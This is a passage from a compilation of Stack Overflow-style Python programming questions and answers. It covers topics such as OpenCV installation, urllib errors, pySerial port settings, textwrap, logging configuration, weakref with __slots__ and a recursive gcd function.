because of per-object memory overhead as well as memory fragmentation.
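A quick way to see what the compression buys you (the numbers depend entirely on
what `obj` contains); using a binary pickle protocol usually shrinks things further
before compressing:

    pickled = cPickle.dumps(obj, 2)        # protocol 2 = compact binary pickle
    compressed = zlib.compress(pickled)
    print len(pickled), '->', len(compressed)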
|
how to install opencv in EPD?
Question: There is no opencv in EPD 7.3.1. My EPD path is like /usr/epd
I have installed opencv using the method below the dashed line successfully.
Now cv2.so and cv.py are made in the directory /usr/local/lib/python2.7/site-
packages
But since my default python is epd, there is a path problem now. I copy cv2.so
and cv.py to /usr/epd/lib/python2.7/site-packages. Now I can import cv2 under
epd.
I am afraid this could cause hidden trouble some day. Is my method right?
* * *
I just follow the link [opencv
install](http://docs.opencv.org/doc/tutorials/introduction/linux_install/linux_install.html)
Building OpenCV from Source Using CMake, Using the Command Line:
1\. Create a temporary build directory where you want to put the generated
Makefiles, project files as well as the object files and output binaries.
2\. Enter that build directory and type
    cmake [optional parameters] <path to the OpenCV source directory>
For example
cd ~/opencv
mkdir release
cd release
cmake -D CMAKE_BUILD_TYPE=RELEASE -D CMAKE_INSTALL_PREFIX=/usr/local ..
3\. Enter the created temporary directory and proceed with:
make
sudo make install
Answer: Linux has a number of interfaces to opencv. Have you tried:
<http://docs.opencv.org/doc/tutorials/introduction/linux_install/linux_install.html>
or [OpenCV 2.4.3 and
Python](http://stackoverflow.com/questions/13381574/opencv-2-4-3-and-python)
|
Python urlopen error 404 directories
Question: I have this code :
from urllib.request import urlopen
from bs4 import BeautifulSoup
page = urlopen("http://www.doctoralia.com")
soup = BeautifulSoup(page)
myfile = open('data.txt','w')
myfile.write(soup.prettify())
myfile.close()
print('done boy !')
It works well! But when I change `urlopen("http://www.doctoralia.com")` to
`urlopen("http://www.doctoralia.com/healthpros")` it throws me this error:
Traceback (most recent call last):
File "test.py", line 4, in <module>
page = urlopen("http://www.doctoralia.com/healthpros")
File "C:\Python33\lib\urllib\request.py", line 156, in urlopen
return opener.open(url, data, timeout)
File "C:\Python33\lib\urllib\request.py", line 475, in open
response = meth(req, response)
File "C:\Python33\lib\urllib\request.py", line 587, in http_response
'http', request, response, code, msg, hdrs)
File "C:\Python33\lib\urllib\request.py", line 513, in error
return self._call_chain(*args)
File "C:\Python33\lib\urllib\request.py", line 447, in _call_chain
result = func(*args)
File "C:\Python33\lib\urllib\request.py", line 595, in http_error_default
raise HTTPError(req.full_url, code, msg, hdrs, fp)
What's the problem ? Thanks
Answer: If you still want to see the actual page content even though the server
returned an error status, you have to handle this HTTPError.
Example:
from urllib.request import urlopen
from urllib.error import HTTPError
from bs4 import BeautifulSoup
try:
page = urlopen("http://www.doctoralia.com/healthpros")
except HTTPError as e:
if e.code == 404:
soup = BeautifulSoup(e.fp.read())
print(soup.prettify())
This will output the page's HTML if the request raised a 404 HTTPError.
You can remove the if statement to do this for every HTTPError.
|
Virtual COM failing with pyserial/Linux, but working otherwise
Question: I am using Virtual COM Port (VCP) example code from
<http://blog.memsme.com/stm32f4-virtual-com-port-2/> on STM32F4 Discovery
Board to have USB VCP. This code is originally by ST and used by many other
people in their projects
Communication with the STM32F4 over VCP works fine from Windows. In Linux
(Ubuntu 12.04 x86), if I send data to the port with
echo "aasfg" > /dev/ttyACM0
then, the MCU gets the data and everything works fine. I can receive the
continuous data stream with
cat /dev/ttyACM0
However, if I send data with the simple Python script that uses pySerial
import serial
sercom = serial.Serial('/dev/ttyACM0')
sercom.write('asdf')
then I stop receiving data with the _cat_ command, and following _cat_
commands also don't receive any data. The MCU is constantly executing some USB
interrupt routines, never returning to execute actual application code. I can
receive data from VCP again after re-plugging the device.
The STM32 USB VCP code is probably not perfect, but it is used by many other
people in many projects so it should be good enough. I am not able to debug
that code. I suspect that sending data with pySerial does something with the
port that the VCP driver (either on STM32 or PC) does not like and I would
like to track it down and hopefully still use pySerial.
I executed
stty --file=/dev/ttyACM0 -a
before and after pyserial broke the communication. After breaking the VCP with
pyserial, setting _-clocal_ became _clocal_ and setting _min = 1_ became _min
= 0_. Are these relevant in VCP communication and could they hint how to fix
VCP with pySerial?
Answer: The serial port was actually fine. As I mentioned, the pySerial call changed
the port parameters. The parameter _min = 0_ meant that _cat /dev/ttyACM0_
returned immediately; reconfiguring to _min = 1_ with _stty_ made cat block
and output the data as before.
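For reference, the port can be put back into blocking-read mode with the same stty
interface the question used — here wrapped in Python so it can run right after the
pySerial call (the setting is exactly the _min = 1_ value mentioned above):

    import subprocess
    # restore blocking reads so `cat /dev/ttyACM0` behaves as before
    subprocess.call(['stty', '--file=/dev/ttyACM0', 'min', '1'])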
|
Python Help. Code is going past if/Else Statement
Question: The assignment is to write a code that can do triangles (find the perimeter,
area, if it is an equilateral, right, etc.)
I believe my code is on target, but it doesn't render an error like it should
when the numbers don't form a triangle. Any help would be greatly appreciated.
import math
A = int (input ("Type in your first integer that you would like to test:"))
print ("Your first integer to be tested is:", A)
B = int (input ("Type in your second integer that you would like to test:"))
print ("Your second integer to be tested is:", B)
C = int (input ("Type in your third integer that you would like to test:"))
print ("Your third integer to be tested is:", C)
if (A > B):
largest = A
else:
largest = B
if (C > largest):
largest = C
print ("The largest number is:", largest)
if A<=0 or B<=0 or C<=0:
print("The numbers don't form a triangle")
else:
print("The Triangle's Perimeter is:")
print(int(A+B+C))
print("The semiperimeter is:")
print(int((A+B+C)/2))
print("The Area of the triangle is:")
print (int (math.sqrt((A+B+C)/2)*(((A+B+C)/2)-A)*(((A+B+C)/2)-B)*(((A+B+C)/2)-C)))
if int(A != B and A != C and B != C):
print("The triangle is a scalene")
else:
print ("The triangle is not a scalene")
if int(A == B and B == A or A == C and C == A or C == B and B == C):
print ("The triangle is an isosceles")
else:
print ("The triangle is not an isosceles")
if int(A == B == C):
print("The triangle is an equilateral")
else:
print("The triangle is not an equilateral")
if int(C*C == A*A + B*B):
print("The triangle is a right triangle")
else:
print("The triangle is not a right triangle")
Answer: Try this code:
import math
def chkRectr(x1,x2,x3):
if (x1**2==x2**2+x3**2)or(x2**2==x1**2+x3**2)or(x3**2==x2**2+x1**2):
return True
else:
return False
def fHigh(aa,bb,cc):
d=math.sqrt(3)/2
if (aa==bb):
return math.sqrt(aa**2-(cc/2)**2)
elif (aa==cc):
return math.sqrt(aa**2-(bb/2)**2)
elif (bb==cc):
return math.sqrt(bb**2-(aa/2)**2)
def trikind():
if (a==b)or(b==c)or(a==c):
if a==b==c:
print("And it's kind: Equilateral triangle")
else:
if chkRectr(a,b,c)==True:
print("And it's kind: Isosceles rectanglar triangle")
else:
print("And it's kind: Isosceles triangle")
print("And its height is "+str(fHigh(a,b,c)))
elif chkRectr(a,b,c)==True:
print("And it's kind: Rectanglar triangle")
print("In this program I will tell you about existence of a triangle and kind of it.")
a,b,c=[float(x) for x in input("Enter three sides lenth(Split with ','): ").split(",")]
if a+b>c:
if b+c>a:
if c+a>b:
print("\nIt's a triangle!\n")
trikind()
else:
print("\nSorry but It's not a triangle!!!! :((")
It's different from your approach, but notice how it checks whether the sides
actually form a triangle.
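As for why the original code never reports an error: it only rejects non-positive
sides, not sides that violate the triangle inequality. A minimal fix to that check,
with the same variables as the question, would be:

    # reject non-positive sides and sides that violate the triangle inequality
    if A <= 0 or B <= 0 or C <= 0 or A + B <= C or B + C <= A or A + C <= B:
        print("The numbers don't form a triangle")
    else:
        ...  # perimeter, area and classification as in the original code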
|
I need to load an excel file into python 2.7 using an interface
Question: I need to load the file in order to do some operations with it, but I would
like to select it from an interface instead of just running a script with the
name of the file hard-coded, as the file name will change every day.
Answer: You can use Tkinter `askopenfilename` :
from tkFileDialog import askopenfilename
path = askopenfilename()
f = open(path, 'r') # OR DO WHAT YOU WANT WITH PATH
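From there the chosen workbook can be handed to whatever does the work — for
instance a small sketch with `xlrd` (assuming it is installed), in the spirit of
the question:

    import xlrd
    book = xlrd.open_workbook(path)   # path comes from askopenfilename() above
    sheet = book.sheet_by_index(0)
    print sheet.nrows, sheet.ncols    # Python 2.7, as in the question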
|
How to put appropriate line breaks in a string representing a mathematical expression that is 9000+ characters?
Question: I have a many long strings (9000+ characters each) that represent mathematical
expressions. I originally generate the expressions using sympy, a python
symbolic algebra package. A truncated example is:
a = 'm[i]**2*(zb[layer]*m[i]**4 - 2*zb[layer]*m[j]**2*m[i]**2 + zb[layer]*m[j]**4 - zt[layer]*m[i]**4 + 2*zt[layer]*m[j]**2*m[i]**2 - zt[layer]*m[j]**4)**(-1)*ab[layer]*sin(m[i]*zb[layer])*sin(m[j]*zb[layer])'
I end up copying the text in the string and then using it as code (i.e. copy
the text between ' and ' and then paste it into a function as code):
def foo(args):
return m[i]**2*(zb[layer]*m[i]**4 - 2*zb[layer]*m[j]**2*m[i]**2 + zb[layer]*m[j]**4 - zt[layer]*m[i]**4 + 2*zt[layer]*m[j]**2*m[i]**2 - zt[layer]*m[j]**4)**(-1)*ab[layer]*sin(m[i]*zb[layer])*sin(m[j]*zb[layer])
The long lines of code become unwieldy and slow down my IDE (Spyder) so I want
to put some linebreaks in (the code works fine as one long line). I have
successfully done this manually by enclosing the expression in brackets and
putting in linebreaks myself (i.e. use implicit line contnuation as per
[PEP8](http://www.python.org/dev/peps/pep-0008/#id13)):
def foo(args):
return (m[i]**2*(zb[layer]*m[i]**4 - 2*zb[layer]*m[j]**2*m[i]**2 +
zb[layer]*m[j]**4 - zt[layer]*m[i]**4 + 2*zt[layer]*m[j]**2*m[i]**2 -
zt[layer]*m[j]**4)**(-1)*ab[layer]*sin(m[i]*zb[layer])*sin(m[j]*zb[layer]))
I'd like some function or functionality that will put in the linebreaks for
me. I've tried using the `textwrap` module but that splits the line an
inappropriate places. For example in the code below the last line splits in
the middle of 'layer' which invalidates my mathematical expression:
>>> import textwrap
>>> a = 'm[i]**2*(zb[layer]*m[i]**4 - 2*zb[layer]*m[j]**2*m[i]**2 + zb[layer]*m[j]**4 - zt[layer]*m[i]**4 + 2*zt[layer]*m[j]**2*m[i]**2 - zt[layer]*m[j]**4)**(-1)*ab[layer]*sin(m[i]*zb[layer])*sin(m[j]*zb[layer])'
>>> print(textwrap.fill(a,width=70))
m[i]**2*(zb[layer]*m[i]**4 - 2*zb[layer]*m[j]**2*m[i]**2 +
zb[layer]*m[j]**4 - zt[layer]*m[i]**4 + 2*zt[layer]*m[j]**2*m[i]**2 -
zt[layer]*m[j]**4)**(-1)*ab[layer]*sin(m[i]*zb[layer])*sin(m[j]*zb[lay
er])
My rules of thumb for manually splitting the string and still having a valid
expression when I paste the string as code are:
1. enclose whole expression in `()`.
2. split at approximately 70 characters wide after white-space or a `+`, `-`, `*`, `]`, `)`.
Answer: First, just passing
[`break_long_words=False`](http://docs.python.org/3.3/library/textwrap.html#textwrap.TextWrapper.break_long_words)
will prevent it from splitting `layer` in the middle.
But that isn't enough to fix your problem. The output will be valid, but it
may exceed 70 columns. In your example, it will:
m[i]**2*(zb[layer]*m[i]**4 - 2*zb[layer]*m[j]**2*m[i]**2 +
zb[layer]*m[j]**4 - zt[layer]*m[i]**4 + 2*zt[layer]*m[j]**2*m[i]**2 -
zt[layer]*m[j]**4)**(-1)*ab[layer]*sin(m[i]*zb[layer])*sin(m[j]*zb[layer])
Fortunately, while `textwrap` can't do everything in the world, it also makes
good sample code. That's why [the
docs](http://docs.python.org/3.3/library/textwrap.html) link straight to [the
source](http://hg.python.org/cpython/file/3.3/Lib/textwrap.py).
What you want is essentially the `break_on_hyphens`, but breaking on
arithmetic operators as well. So, if you just change the regexp to use
`(-|\+|\*\*|\*)` in `wordsep_re`, that may be all it takes. Or it may take a
bit more work, but it should be easy to figure out from there.
Here's an example:
class AlgebraWrapper(textwrap.TextWrapper):
wordsep_re = re.compile(r'(\s+|(?:-|\+|\*\*|\*|\)|\]))')
w = AlgebraWrapper(break_long_words=False, break_on_hyphens=True)
print w.fill(a)
This will give you:
m[i]**2*(zb[layer]*m[i]**4 - 2*zb[layer]*m[j]**2*m[i]**2 + zb[layer]*
m[j]**4 - zt[layer]*m[i]**4 + 2*zt[layer]*m[j]**2*m[i]**2 - zt[layer]*
m[j]**4)**(-1)*ab[layer]*sin(m[i]*zb[layer])*sin(m[j]*zb[layer])
But really, you just got lucky that it didn't need to break on brackets or
parens, because as simple as I've written it, it will break before a bracket
just as easily as after one, which will be syntactically valid, but very ugly.
The same thing is true for operators, but it's far less ugly to break before a
`*` than a `]`. So, I'd probably split on just actual operators, and leave it
at that:
wordsep_re = re.compile(r'(\s+|(?:-|\+|\*\*|\*))')
If that's not acceptable, then you'll have to come up with the regexp you
actually want and drop it in place of `wordsep_re`.
* * *
An alternative solution is to decorate-wrap-undecorate. For example:
    b = re.sub(r'(-|\+|\*\*|\*)', r'\1 ', a)
c = textwrap.fill(b)
d = re.sub(r'(-|\+|\*\*|\*) ', r'\1', c)
Of course this isn't perfect—it won't prefer existing spaces over added
spaces, and it will fill to less than 70 columns (because it will be counting
those added spaces toward the limit). But if you're just looking for something
quick&dirty, it may serve, and if not, it may at least be a starting point to
what you actually need.
* * *
Either way, the easiest way to enclose the whole thing in parens is to do that
up-front:
if len(a) >= 70:
a = '({})'.format(a)
|
Error when installing Django using pythonbrew
Question: I am currently facing an issue when trying to install Django using pythonbrew.
My system is running ubuntu 12.04 (LTS) and I am following these instructions
to get django running:
<http://www.tangowithdjango.com/book/chapters/requirements.html#installing-
software>
I have followed everything exactly as specified by the book but when it comes
time to use Django on my pythonbrew version of Python, I get this error:
    Traceback (most recent call last):
      File "", line 1, in
    ImportError: No module named django
So I decided to do some investigating and I went into the folder that is now
specified as my PYTHONPATH for adding additional libraries, which is:
./.pythonbrew/pythons/Python-2.7.5/lib/python2.7/site-packages (I've left out
the above 2 folder levels, but my PYTHONPATH is correct, confirmed by echo
$PYTHONPATH)
In the site-packages folder, there is nothing there, which explains the Django
error.
So I switched off pythonbrew and then ran python and then 'import django' and
it worked.
This likely means that when trying to install stuff to Python, it is probably
not using the PYTHONPATH for some reason (or maybe something else).
I have taken a look here:
1) [Error after installing Django (supposed PATH or PYTHONPATH
"error")](http://stackoverflow.com/questions/2935723/error-after-installing-
django-supposed-path-or-pythonpath-error) (the solution and question seems
very different to mine, with slight similarities)
2) [how to install additional python packages with
pythonbrew](http://stackoverflow.com/questions/9217687/how-to-install-
additional-python-packages-with-pythonbrew) (the guy didn't get a response and
did a hack)
3) <http://suvashthapaliya.com/blog/2012/01/sandboxed-python-virtual-
environments/> (this guy recommends using virtualenv to create a virtual
environment before installing packages)
I'm not sure what to do now and I suspect the error is either with my
PYTHONPATH or there's some permission error that is causing all my installed
packages to go to the root python installation instead of the pythonbrew
package.
Any assistance will be greatly appreciated (also, this isn't a unique problem,
as I expect many others to face this installation issue with pythonbrew and
django).
Answer: I'm new to Stack Overflow, so I couldn't comment on your answer above about
what you got when running
pip -V
I had the same issue, but I fix it by doing what this post says:
[Using pip in pythonbrew](http://stackoverflow.com/questions/15096306/using-
pip-in-pythonbrew)
Hope this helps!
|
Python MySQL DB
Question: I have 4 tables in a Mysql Db named Employee. The structure of the tables are
as follows:
Edetails(**_id,name,age_**)
Edepartment(**_id,name,dept_**)
Edesignation(**_id,name,desig_**)
Esalary(**_id,name,basic,pf_**)
id is the primary key in all the tables. My question is: when a user gives the
id of an employee, how can I fetch **_id, name, age, basic, pf_** all at once?
I have created all tables and added entries using Python. For fetching I used
the code below.
import MySQLdb as mdb
con = mdb.connect('localhost', 'root', 'root', 'Employee')
cur=con.cursor()
x=raw_input("Enter Employee id:")
cur.execute("Select * from Edepartment,Edesignation,Esalary,Edetails where dept.id=%s",(id))
res=cur.fetchall()
print res
Thanks in advance..
Answer: The `fetchall()` method gives you all rows in a set. Even if the result set
contains one record, you still have to do something like the following
import MySQLdb as mdb
con = mdb.connect('localhost', 'root', 'root', 'Employee')
cur=con.cursor()
x=raw_input("Enter Employee id:")
    cur.execute("Select table1.id, table2.name from table1, table2 where table1.id=%s", (x,))
results=cur.fetchall()
for result in results:
print 'id = %s' % result[0]
print 'name = %s' % result[1]
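Applied to the tables in the question (Edetails holds id/name/age, Esalary holds
basic/pf), a sketch of a single query that fetches everything at once might look
like this:

    cur.execute(
        "SELECT d.id, d.name, d.age, s.basic, s.pf "
        "FROM Edetails d JOIN Esalary s ON s.id = d.id "
        "WHERE d.id = %s", (x,))
    row = cur.fetchone()
    if row is not None:
        print 'id=%s name=%s age=%s basic=%s pf=%s' % row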
|
Running python manage.py command from django with arguments
Question: I have the command :
./manage.py dbbackup --clean --compress
provided by the django-dbbackup app which performs a backup of my PostgreSQL
database to Amazon S3. I am trying to run this command inside a django celery
task run daily.
When I run:
> from django.core.management import call_command
> call_command('dbbackup --clean --compress', interactive=False)
I am getting an exception because of the clean and compress arguments.
Any ideas on how I can run this command?
Answer: I magically found that running:
call_command('dbbackup', clean=True, compress=True, interactive=False)
works perfectly.
|
Good way to collect programmatically generated test suites in nose or pytest
Question: Say I've got a test suite like this:
class SafeTests(unittest.TestCase):
# snip 20 test functions
class BombTests(unittest.TestCase):
# snip 10 different test cases
I am currently doing the following:
suite = unittest.TestSuite()
loader = unittest.TestLoader()
safetests = loader.loadTestsFromTestCase(SafeTests)
suite.addTests(safetests)
if TARGET != 'prod':
unsafetests = loader.loadTestsFromTestCase(BombTests)
suite.addTests(unsafetests)
unittest.TextTestRunner().run(suite)
I have a major problem, and one interesting point:
* I would like to be using nose or py.test (doestn't really matter which)
* I have a large number of different applications that are exposing these test suites via entry points.
I would like to be able to aggregate these custom tests across all installed
applications so I can't _just_ use a clever naming convention. I don't
_particularly_ care about these being exposed through entry points, but I
**do** care about being able to run tests across applications in site-
packages. (Without just importing... every module.)
I do _not_ care about maintaining the current dependency on
`unittest.TestCase`, trashing that dependency is practically a goal.
* * *
**EDIT** This is to confirm that @Oleksiy's point about passing args to
`nose.run` does in fact work with some caveats.
Things that _do not_ work:
* passing all the files that one wants to execute (which, _weird_)
* passing all the _modules_ that one wants to execute. (This either executes nothing, the wrong thing, or too many things. Interesting case of 0, 1 or many, perhaps?)
* Passing in the modules _before_ the directories: the directories have to come first, or else you will get duplicate tests.
This fragility is absurd, if you've got ideas for improving it I welcome
comments, or I set up [a github repo with my experiments trying to get this to
work](https://github.com/quodlibetor/test-loading-experiment).
All that aside, The following works, including picking up multiple projects
installed into site-packages:
#!python
import importlib, os, sys
import nose
def runtests():
modnames = []
dirs = set()
for modname in sys.argv[1:]:
modnames.append(modname)
mod = importlib.import_module(modname)
fname = mod.__file__
dirs.add(os.path.dirname(fname))
modnames = list(dirs) + modnames
nose.run(argv=modnames)
if __name__ == '__main__':
runtests()
which, if saved into a `runtests.py` file, does the right thing when run as:
runtests.py project.tests otherproject.tests
Answer: For nose you can have both tests in place and select which one to run using
[attribute](http://nose.readthedocs.org/en/latest/plugins/attrib.html "attrib
plugin") plugin, which is great for selecting which tests to run. I would keep
both tests and assign attributes to them:
from nose.plugins.attrib import attr
@attr("safe")
class SafeTests(unittest.TestCase):
# snip 20 test functions
class BombTests(unittest.TestCase):
# snip 10 different test cases
For your production code I would just call nose with `nosetests -a safe`, or
set `NOSE_ATTR=safe` in your production OS test environment, or call the run
method on the nose object to run it natively in Python with `-a` command line
options based on your `TARGET`:
import sys
import nose
if __name__ == '__main__':
module_name = sys.modules[__name__].__file__
argv = [sys.argv[0], module_name]
if TARGET == 'prod':
            argv.append('-a safe')
result = nose.run(argv=argv)
Finally, if for some reason your tests are not discovered you can explicitly
mark them as test with `@istest` attribute (`from nose.tools import istest`)
|
Output from sys.stdout in interactive mode
Question: I tested sys.stdout.write in interactive mode; why do I get the 'extra' 1 and
2 suffixed to the numbers? If I run the code from a file I get the expected
output (1234...) Python 3.3 on a Windows machine
>>> import sys
>>> for i in range(15):
... sys.stdout.write(str(i))
...
01
11
21
31
41
51
61
71
81
91
102
112
122
132
142
>>>
Answer: Python is _also_ echoing the return value of `sys.stdout.write()` call, which
is the number of bytes written:
>>> import sys
>>> written = sys.stdout.write('10')
10>>> written
2
Here the next prompt follows the `'10'` written without a newline.
Or, as a different way of demoing, writing 0 bytes in a loop prints `0` that
many times:
>>> for i in range(3):
... sys.stdout.write('')
...
0
0
0
|
Where does python argument unpacking fall into the order of operations?
Question: <http://docs.python.org/2/reference/expressions.html#operator-precedence>
My guess is that it falls into one of the buckets above dict lookups since
func(*mydict[mykey])
does the dictionary lookup first. Is there a better chart than my initial link
that goes into more detail regarding order of operations in python?
Answer: The unpacking `*` is not an operator; it's part of the call syntax. It's
defined under
[Calls](http://docs.python.org/2/reference/expressions.html#calls), where you
can see that:
["," "*" expression]
… can be part of an `argument_list` in two different places. (The semantics
are described in the paragraphs starting "If there are more positional…" and
"If the syntax…".)
So it takes any `expression`. You can see that no operator takes a full
`expression` as its direct argument. So, if you want to loosely consider `*`
an operator, it binds more loosely than any operator. But just remember that
it isn't actually an operator.
Also keep in mind that this was all changed in Python 3.x. But the basic idea
is the same—both argument unpacking and assignment unpacking take an
`expression`, not just a `primary`, and therefore loosely-speaking bind more
loosely than any operator, which all take a `primary` or something more
specific.
* * *
Meanwhile, you might want to try running the parser on your code to see what
it does:
>>> import ast
>>> tree = ast.parse('func(*mydict[mykey])')
>>> ast.dump(tree)
"Module(body=[Expr(value=Call(func=Name(id='func', ctx=Load()), args=[], keywords=[],
starargs=Subscript(value=Name(id='mydict', ctx=Load()),
slice=Index(value=Name(id='mykey', ctx=Load())), ctx=Load()), kwargs=None))])"
You can see that the entire `Subscript` expression ends up as the `starargs`
to the `Call`.
The `ast` module uses the [Abstract
Grammar](http://docs.python.org/2/library/ast.html#abstract-grammar) rather
than the one described in the reference manual. It has different names for
things, and doesn't handle some things that are considered part of the grammar
but actually done at a higher level than the parser, and so on—but, on the
other hand, it's a lot easier to take in all at once. You can see that an
`expr` used for `starargs` can be a `Subscript`.
|
Weakref and __slots__
Question: Consider the following code:
from weakref import ref
class Klass(object):
# __slots__ = ['foo']
def __init__(self):
self.foo = 'bar'
k = Klass()
r = ref(k)
it works but when I uncomment the `__slots__` it breaks with `TypeError:
"cannot create weak reference to 'Klass' object"` under Python 2.6.
Please, does anyone know if this is an inherent limitation of Python and
`__slots__` or if it is a bug? How to work-around it?
Answer: > Without a `__weakref__` variable for each instance, classes defining
> `__slots__` do not support weak references to its instances. If weak
> reference support is needed, then add `__weakref__` to the sequence of
> strings in the `__slots__` declaration.
From the [Python
documentation](http://docs.python.org/2/reference/datamodel.html#slots).
If you add `__weakref__` to `__slots__`, your code will work:
>>> from weakref import ref
>>>
>>> class Klass(object):
>>> __slots__ = ['foo', '__weakref__']
>>> def __init__(self):
>>> self.foo = 'bar'
>>> k = Klass()
>>> k
=> <__main__.Klass object at ...>
>>> r = ref(k)
>>> r
=> <weakref at ...; to 'Klass' at ...>
|
Logging error involving .conf+main.py modules
Question: I think I'm missing something big and for the life of me, I can't figure it
out. I have a `logging.conf` file that I am trying my main (say, `xyz.py`)
file to read. But I am getting this weird error. I have the traceback below
followed by the configuration file - `logging.conf` and then the relevant part
in `xyz.py`.
File "xyz.py", line 28, in <module>
log = logging.config.fileConfig('/Users/Username/Desktop/logging.conf')
File "/usr/local/Cellar/python/2.7.5/Frameworks/Python.framework/Versions/2.7/lib/python2.7/logging/config.py", line 78, in fileConfig
handlers = _install_handlers(cp, formatters)
File "/usr/local/Cellar/python/2.7.5/Frameworks/Python.framework/Versions/2.7/lib/python2.7/logging/config.py", line 156, in _install_handlers
h = klass(*args)
TypeError: __init__() takes at most 7 arguments (23 given)
The configuration file - full path = `/Users/Username/Desktop/logging.config`
(I followed the instruction from
<http://docs.python.org/release/2.5.2/lib/logging-config-fileformat.html>)
[loggers]
keys=root
[handlers]
keys=handlersmtp, handlerfile
[formatters]
keys=formatter
[formatter_formatter]
format=%(asctime)s %(name)s %(levelname)s %(message)s
datefmt=
class=logging.Formatter
[logger_root]
level=NOTSET
handlers=handlersmtp, handlerfile
[handler_handlersmtp]
class=handlers.SMTPHandler
level= INFO
formatter=formatter
args=(('localhost', 25),'[email protected]', ['[email protected]'],
'The log')
[handler_handlerfile]
class=handlers.RotatingFileHandler
level= INFO
formatter=formatter
backupCount=1440
args=('alogger.log')
The part in main file -`xyz.py`
import logging
import logging.config
log = logging.config.fileConfig('/Users/Username/Desktop/logging.config')
I looked at Python's logging/config.py module but couldn't follow why it
was raising this. It's a pretty big file.
EDIT:
@VineySajip's answer removed the error above but I am working on this new one
now.
[handler_handlerfile]
class=handlers.RotatingFileHandler
level= INFO
formatter=formatter
args=('alogger.log', mode='a', maxBytes=25000,
backupCount=0, encoding=None, delay=0) #New line to fit
#this page but code has it all in 1 line
The new traceback:
Traceback (most recent call last):
File "cpu6.py", line 29, in <module>
log = logging.config.fileConfig('/Users/Username/Desktop/logging.ini')
File "/usr/local/Cellar/python/2.7.5/Frameworks/Python.framework/
Versions/2.7/lib/python2.7/logging/config.py", line 78, in fileConfig
handlers = _install_handlers(cp, formatters)
File "/usr/local/Cellar/python/2.7.5/Frameworks/Python.framework/
Versions/2.7/lib/python2.7/logging/config.py", line 155, in _install_handlers
args = eval(args, vars(logging))
File "<string>", line 1
('alogger.log', mode='a', maxBytes=25000,
backupCount=0, encoding=None, delay=0)
^
SyntaxError: invalid syntax
Answer: In your config, `('alogger.log')` is not a valid argument tuple, and in fact
the whole section looks wrong. `RotatingFileHandler` has the following
arguments:
filename, mode='a', maxBytes=0, backupCount=0, encoding=None, delay=0
and you need to specify an argument tuple which reflects this. You haven't
specified a `maxBytes` value, so rollover would never occur; and 1440 looks
like an odd number of backup log files to keep. Review the documentation to
make sure you're using the correct arguments for the handler's `__init__` method.
**Update:** Leave out the parameter names, like so:
args=('alogger.log', 'a', 25000, 0, None, 0)
|
Python: string formatting and calling functions
Question: So I'm running into a string formatting error when trying to pass the
arguments num1 and num2 to the function gcd. I'm not sure how to fix this.
Please bear with me since I'm new to Python programming. Thanks!
#!/usr/bin/python
import sys
from collections import defaultdict
lines = sys.stdin.read()
lineArray = lines.split()
listLength = len(lineArray)
def gcd(a, b):
c = 0
if a > b:
r = a%b
if r == 0:
return b
else:
return gcd(b, r)
if a < b:
c = b
b = a
a = c
return gcd(a, b)
for x in range(0, listLength):
num1 = lineArray[x]
num2 = lineArray[x+1]
print num1, 'and', num2
print gcd(num1, num2)
print 'end'
Answer: It's pretty simple. `lineArray` is not a list containing integers, but
strings. So when you do this:
r = a%b
It tries to format the string `a`, instead of calculating `a%b`. To solve
this, convert `a` and `b` to integers:
def gcd(a, b):
a,b = int(a),int(b)
c = 0
if a > b:
r = a%b
if r == 0:
return b
else:
return gcd(b, r)
if a < b:
c = b
b = a
a = c
return gcd(a, b)
Also, in your `gcd` function, the recursion never ends. Hint: You'll have to
check if b is 0. Hope this helps!
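For reference, a compact version that terminates — classic Euclid's algorithm,
using the `b == 0` check from the hint:

    def gcd(a, b):
        a, b = int(a), int(b)
        if b == 0:
            return a
        return gcd(b, a % b)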
|